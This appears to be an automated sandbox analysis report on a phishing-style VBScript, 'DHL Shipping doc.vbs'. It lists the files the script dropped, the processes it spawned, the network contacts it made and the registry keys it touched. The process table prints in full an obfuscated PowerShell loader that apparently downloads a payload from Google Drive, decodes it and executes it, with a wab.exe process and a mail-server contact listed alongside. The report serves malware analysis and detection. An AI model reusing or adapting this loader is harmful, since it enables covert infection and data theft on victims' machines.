Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DHL Shipping doc.vbs
|
ASCII text, with very long lines (352), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40azcxgo.inr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfnafi35.syn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ireixikg.yh2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofsvltvo.wog.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Aptychus.Whi
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function
Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165;
$Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function
Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp.
ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran
e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S
ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens
'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls
Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap
VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG
nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6
Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx
,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev
F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt
ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean
(Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB
rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes
');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit
rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean
(Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c
QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke
');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG
otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4
.all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn
');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r
FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey
D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean
(Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes
s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga
');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo
lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2
rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und
r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo
OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne
Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while
(!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s
BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens
' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb
TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP
Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum
') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm
ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym
rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey.
SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg
Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl
seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen
gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl
ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,]
Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS
Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb
ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt
ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI
PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk
');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr
Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4
Orga)Under ');Spelean $Patellula;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function
Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165;
$Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function
Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp.
ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran
e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S
ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens
'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls
Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap
VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG
nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6
Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx
,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev
F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt
ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean
(Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB
rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes
');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit
rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean
(Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c
QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke
');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG
otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4
.all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn
');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r
FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey
D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean
(Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes
s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga
');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo
lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2
rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und
r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo
OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne
Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while
(!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s
BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens
' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb
TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP
Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum
') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm
ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym
rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey.
SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg
Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl
seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen
gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl
ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,]
Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS
Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb
ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt
ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI
PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk
');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr
Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4
Orga)Under ');Spelean $Patellula;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://api.ipify.org/
|
104.26.13.205
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://r3.i.lencr.org/0R
|
unknown
|
||
|
http://mail.cash4cars.nz
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
https://aka.ms/pscore6lBkq
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://api.ipify.org/t
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://api.ipify.org
|
unknown
|
||
|
http://crl.mUy
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://r3.o.lencr.org0
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.cash4cars.nz
|
114.142.162.17
|
|
|
|
drive.google.com
|
142.251.2.139
|
||
|
drive.usercontent.google.com
|
142.251.2.132
|
||
|
api.ipify.org
|
104.26.13.205
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
114.142.162.17
|
mail.cash4cars.nz
|
Australia
|
|
|
|
142.251.2.139
|
drive.google.com
|
United States
|
||
|
104.26.13.205
|
api.ipify.org
|
United States
|
||
|
142.251.2.132
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
A967000
|
direct allocation
|
page execute and read and write
|
|
|
|
8920000
|
direct allocation
|
page execute and read and write
|
|
|
|
22451000
|
trusted library allocation
|
page read and write
|
|
|
|
2247B000
|
trusted library allocation
|
page read and write
|
|
|
|
1D96966F000
|
trusted library allocation
|
page read and write
|
|
|
|
5ED0000
|
trusted library allocation
|
page read and write
|
|
|
|
A632CFB000
|
stack
|
page read and write
|
||
|
29A0000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
84C0000
|
heap
|
page read and write
|
||
|
7629000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
24A60000
|
trusted library allocation
|
page read and write
|
||
|
24A30000
|
trusted library allocation
|
page read and write
|
||
|
5ECA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
24A70000
|
trusted library allocation
|
page read and write
|
||
|
21764C00000
|
heap
|
page read and write
|
||
|
1D957B67000
|
heap
|
page read and write
|
||
